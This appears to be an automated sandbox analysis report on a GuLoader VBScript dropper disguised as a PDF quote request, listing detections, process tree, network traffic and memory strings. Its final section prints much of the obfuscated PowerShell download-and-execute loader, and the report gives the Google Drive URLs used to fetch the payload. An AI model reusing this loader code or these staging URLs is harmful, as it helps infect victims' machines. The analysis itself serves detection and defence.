Windows Analysis Report
RFQ_24196MR_PDF.vbs

Overview

General Information

Sample name:RFQ_24196MR_PDF.vbs
Analysis ID:1542324
MD5:474b9097fcb25c257bedf34672e6bb46
SHA1:67ac04f1e475d3e7402ae654356076cc438dfcd5
SHA256:bb1c7774dbafab1dcdf39f6513f622cb2c9c60324ef033189dd448973911bee6
Tags:vbs, user-abuse_ch
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6892 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted] MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6288 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 4092 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • WerFault.exe (PID: 4812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 2292 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.2132213145.0000000008610000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000006.00000002.2113399982.0000000005665000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000006.00000002.2132748645.0000000008DD5000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
Process Memory Space: powershell.exe PID: 7100 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

Source | Rule | Description | Author | Strings
amsi64_7100.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_7100.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | Strings:
              • 0x10113:$b2: ::FromBase64String(
              • 0xd4ca:$s1: -join
              • 0x6c76:$s4: +=
              • 0x6d38:$s4: +=
              • 0xaf5f:$s4: +=
              • 0xd07c:$s4: +=
              • 0xd366:$s4: +=
              • 0xd4ac:$s4: +=
              • 0xeca4:$s4: +=
              • 0xed24:$s4: +=
              • 0xedea:$s4: +=
              • 0xee6a:$s4: +=
              • 0xf040:$s4: +=
              • 0xf0c4:$s4: +=
              • 0xf8ed:$e4: Get-WmiObject
              • 0xfadc:$e4: Get-Process
              • 0xfb34:$e4: Start-Process
amsi32_6288.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | Strings:
              • 0xc8db:$b2: ::FromBase64String(
              • 0x9d62:$s1: -join
              • 0x350e:$s4: +=
              • 0x35d0:$s4: +=
              • 0x77f7:$s4: +=
              • 0x9914:$s4: +=
              • 0x9bfe:$s4: +=
              • 0x9d44:$s4: +=
              • 0xb53c:$s4: +=
              • 0xb5bc:$s4: +=
              • 0xb682:$s4: +=
              • 0xb702:$s4: +=
              • 0xb8d8:$s4: +=
              • 0xb95c:$s4: +=
              • 0xc185:$e4: Get-WmiObject
              • 0xc374:$e4: Get-Process
              • 0xc3cc:$e4: Start-Process
              • 0x14a8b:$e4: Get-Process

              System Summary

              Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs", ProcessId: 6892, ProcessName: wscript.exe
              Source: Network Connection | Author: frack113 | Data: DestinationIp: 142.250.185.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4092, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739
              Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs", ProcessId: 6892, ProcessName: wscript.exe
              Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted]
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-10-25T19:44:05.509680+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49739 | 142.250.185.238 | 443 | TCP

              AV Detection

              Source: RFQ_24196MR_PDF.vbs | ReversingLabs: Detection: 31%
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.4% probability
              Source: unknown | HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: Binary string: m.pdbpdbtem.pdb source: powershell.exe, 00000001.00000002.1907996504.000001DED9F10000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdbwq source: powershell.exe, 00000006.00000002.2123074697.000000000724C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: WERCD38.tmp.dmp.11.dr
              Source: Binary string: t.Automation.pdb% source: powershell.exe, 00000001.00000002.1944275574.000001DEF3F22000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WERCD38.tmp.dmp.11.dr
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2090574709.0000000002A61000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WERCD38.tmp.dmp.11.dr
              Source: Binary string: hqm.Core.pdb source: powershell.exe, 00000006.00000002.2123074697.000000000724C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2090574709.0000000002A61000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /download?id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e&export=download HTTP/1.1 | Host: drive.usercontent.google.com | Connection: Keep-Alive
              Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49739 -> 142.250.185.238:443
              Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /download?id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic | DNS traffic detected: DNS query: drive.google.com
              Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 00000006.00000002.2123074697.0000000007201000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC0E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://drive.google.com
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDDC56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC0E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://drive.usercontent.google.com
              Source: powershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDBB21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2093208031.00000000045F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDBB21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.2093208031.00000000045F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBdq
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC02E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDD63B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googPR
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDD63B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC05D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: msiexec.exe, 00000008.00000002.2423629116.000000000586A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/5f
              Source: msiexec.exe, 00000008.00000002.2423629116.000000000586A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/=f
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4eP
              Source: powershell.exe, 00000006.00000002.2093208031.0000000004749000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4eXR$l(
              Source: msiexec.exe, 00000008.00000002.2423629116.000000000586A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2435070710.0000000020740000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC0E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com(
              Source: msiexec.exe, 00000008.00000002.2423629116.000000000586A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC043000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC05D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC0E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e&export=download
              Source: msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN&export=download
              Source: msiexec.exe, 00000008.00000002.2423629116.00000000058CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN&export=downloadOW
              Source: msiexec.exe, 00000008.00000002.2423629116.00000000058CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN&export=downloadiW
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDCA70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC02E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC02E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC02E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC02E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC02E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknown; Network traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknown; Network traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknown; Network traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknown; Network traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknown; Network traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknown; HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknown; HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknown; HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknown; HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknown; HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:49740 version: TLS 1.2

              System Summary

              Source: amsi64_7100.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
              Source: amsi32_6288.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6288, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe; COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
              Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
              Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr 
ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA 